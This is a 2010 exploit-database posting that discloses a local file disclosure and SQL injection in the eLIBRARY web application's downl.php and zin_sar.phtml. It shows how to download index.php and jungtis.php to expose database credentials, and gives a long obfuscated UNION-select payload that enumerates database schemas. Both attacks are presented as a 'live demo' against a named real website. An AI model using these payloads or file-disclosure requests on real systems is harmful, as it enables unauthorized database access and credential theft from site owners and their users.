[webapps / 0day] - eLIBRARY (downl.php) Local File Disclosur
Posted on 16 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>eLIBRARY (downl.php) Local File Disclosure / SQL Injection | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='eLIBRARY (downl.php) Local File Disclosure / SQL Injection by Sudden_death in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================================== eLIBRARY (downl.php) Local File Disclosure / SQL Injection ========================================================== # Exploit Title : eLIBRARY (downl.php) Local File Disclosure + SQL Injection # Web : http://elibrary.ru # Date : 14 December 2010 # Author : Sudden_death # Platform/Tested on: Windows XP Professional SP 2 # myweb : http://sudden.isgreat.org ====================================================================== SQL Injection http://127.0.0.1/zin_sar.phtml?id=[SQLi] parameter zin_sar.phtml or etc. [#]------------------------------------------------------------------- File Disclosure # look source downl.php ......... // downloading a file use http://somewhere.com/download.php/?filename=name of file $filename = $_GET['filename']; .......... # once we know the configuration, let us download the "index.php" or "jungtis.php" [*] see the source of the index.php ......... global $db_link, $isreg; $db_link = mysql_connect('localhost','name_user','pass_db') or die ("error!"); mysql_select_db('db_name',$db_link) or die("Neradau DB"); ......... [*] see the source of the jungtis.php .......... class DB { function DB1() { $this->host = "localhost"; $this->db = "db_name"; $this->user = "name_user"; $this->pass = "pass_db"; $this->link = mysql_connect($this->host, $this->user, $this->pass); mysql_select_db($this->db); ......... # vuln http://127.0.0.1/downl.php?filename=index.php or http://127.0.0.1/downl.php?filename=jungtis.php # live demo SQLi http://www.ebiblioteka.eu/zin_sar.phtml?id=1+and+1=2+union+select+1,2,%28select/**/concat%280x3A506E593A,%28unhex%28hex%28concat%28trim%28concat%28@1:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables%29,IFNULL%28@2:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28@1,table_schema%29=0%29,%280x20%29%29,IFNULL%28@3:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2%29,table_schema%29=0%29,%280x20%29%29,IFNULL%28@4:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2,@3%29,table_schema%29=0%29,%280x20%29%29,IFNULL%28@5:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2,@3 ,@4%29,table_schema%29=0%29,%280x20%29%29,IFNULL%28@6:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2,@3,@4,@5%29,table_schema%29=0%29,%280x20%29%29,IFNULL%28@7:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2,@3,@4,@5,@6%29,table_schema%29=0%29,%280x20%29%29,IFNULL%28@8:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2,@3,@4,@5,@6,@7%29,table_schema%29=0%29,%280x20%29%29,IFNULL%28@9:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2,@3,@4,@5,@6,@7,@8%29,table_schema%29=0%29,%280x20%29%29,IFNULL%28@10:=%28Select/**/group_concat%28distinct/**/table_schema%29/**/FROM/**/information_schema.tables/**/WHERE/**/instr%28concat%28@1,@2,@3,@4,@5,@6,@ 7,@8,@10%29,table_schema%29=0%29,%280x20%29%29%29%29%29%29%29%29,0x3A506E593A%29%29,4,5,6,7,8,9-- File Disclosure http://www.ebiblioteka.eu/downl.php?filename=jungtis.php [#]------------------------------------------------------------------- Greets :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati | white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | wenkhairu | jos_ali_jo | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | Jimmy | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's | Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ] [#]------------------------------------------------------------------- note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan! # <a href='http://1337db.com/'>1337db.com</a> [2010-12-16]</pre></body></html>
